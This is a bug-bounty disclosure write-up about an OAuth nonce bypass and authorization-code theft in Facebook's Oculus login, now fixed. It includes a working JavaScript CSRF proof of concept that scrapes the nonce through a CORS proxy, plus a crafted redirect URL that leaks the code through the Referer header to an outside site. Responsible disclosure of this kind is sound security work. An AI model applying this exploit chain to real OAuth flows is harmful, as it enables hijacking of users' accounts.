Bypass OAuth nonce and steal Oculus response code
This post is about a bug that I found in the Facebook Oculus application OAuth flow, which could have been used to bypass the nonce and steal the response code.
Recently Facebook added an OAuth login feature for Oculus, which means a user can log in to Oculus directly with their Facebook account. But there is a nonce parameter in the URL that I had never seen in any other OAuth flow, so I started to dig deeper into it.
OAuth authorisation URL for Facebook Oculus:
Request:
https://www.facebook.com/v2.8/dialog/oauth?app_id=1517832211847102&client_id=1517832211847102&domain=auth.oculus.com&locale=en_GB&origin=1&redirect_uri=https://auth.oculus.com/login/&response_type=code&sdk=joey&version=v2.8&nonce=AXRr8eBAjDTBkzQ7&state=d916afa3-3dc1-bab7-fc9d-3c8f44bf757
Response:
https://auth.oculus.com/login/?code=AQDtxcP7I--AWqEvE-LjcPIjkimy7Z-oQHvLMtGNB8sdKSqhvvv5KFO1KNXgPw4nEewmFsOKsq1GIAcEqJq09rLHlsGQVBxq-HwqbvlE-_unfTayj2HdGp5GGEqsNLlK2zerCpKbBHbiDRW4tr7ZBnxcgebywDbd,lonbrqie5fdwjD-x6jsnI5wnZ4XaDIRMixFoRqtQSne406BwOo2nSVS2o1MmmXkLW_zaW5Vy0SW6&state=d916afa3-3dc1-bab8-fc9d-3c8f44bfe7b7#_=_
The nonce acts as a CSRF token to protect the user from a CSRF attack: if the nonce value does not match, the OAuth request is aborted and the redirect_uri is not followed.
In this OAuth flow I had two challenges:
1. Bypass the nonce
2. Bypass the redirect_uri
Bypassing the nonce is not that easy, but I decided to give it a try. After some testing I had learned nothing (zero progress).
When I Googled, I came across CORS proxies: free services for developers who need to bypass the same-origin policy when making standard AJAX requests to third-party services.
There are some online proxy servers:
When I passed the OAuth URL through this proxy server, it responded with the source code of the given URL. When I searched that source code for nonce, I could not believe it: the nonce value in the real request and in the CORS-proxied request were the same, so a third party could fetch it.
So I had bypassed the nonce; now it was time to bypass the redirect_uri. I started to explore, and it turned out easier than I thought: the URL below redirects the response code to my app domain via Referer leakage.
https://auth.oculus.com/login/?redirect_uri=https://www.facebook.com/dialog/send?client_id=1933886253534366&next=https://www.whatismyreferer.com&from_post=1&error_ok=OK
Now I had bypassed both the nonce and the redirect_uri, but to reproduce the whole process with one click a CSRF PoC had to be created.
The code below first makes a CORS request and extracts the nonce value from the returned source code, then concatenates Final_url + nonce, assigns it to window.location and makes the request.
// Authorization URL fetched through the CORS proxy; the proxied response contains the nonce.
var Cors_URL = "https://crossorigin.me/https://www.facebook.com/v2.8/dialog/oauth?app_id=1517832211847102&redirect_uri=https://auth.oculus.com/login/&response_type=code";
// Authorization URL whose redirect_uri carries the nested redirect; the nonce is appended at the end.
var Final_url = "https://www.facebook.com/v2.8/dialog/oauth?app_id=1517832211847102&response_type=code&redirect_uri=https://auth.oculus.com/login/?redirect_uri=https://www.facebook.com/dialog/send?client_id=1933886253534366%2526next%253Dhttps://www.whatismyreferer.com%2526from_post%253D1%2526error_ok%253DOK&nonce=";

var xhttp = new XMLHttpRequest();
xhttp.open("GET", Cors_URL, true);
xhttp.send();

xhttp.onload = function () {
    // Take the text after the first "nonce=" and cut it at the next "&".
    // Guard against a response without "nonce=" so we report instead of throwing.
    var parts = xhttp.response.split("nonce=");
    var nonce = parts.length > 1 ? parts[1].split("&")[0] : "";
    if (nonce.length == 0) {
        alert("Sorry! nonce not found..");
    } else {
        alert("nonce : " + nonce);
        Final_url = Final_url + nonce;
        window.location = Final_url;
    }
};

xhttp.onerror = function () {
    alert("Please try again.");
};
Video POC:
To reproduce this bug the victim must be logged in to both Facebook and Oculus, because the redirect_uri only works when the user is logged in to their Oculus account.
The Fix:
The leakage of the nonce value through the CORS proxy and the open redirect_uri from Oculus to Facebook were fixed.
Timeline:
30-June-2017: Report sent
6-July-2017: Facebook responded that they were not able to reproduce the issue
6-July-2017: Additional details provided by me
1-August-2017: Further investigation by Facebook
10-August-2017: Fixed by Facebook
14-August-2017: $10,000 bounty awarded by Facebook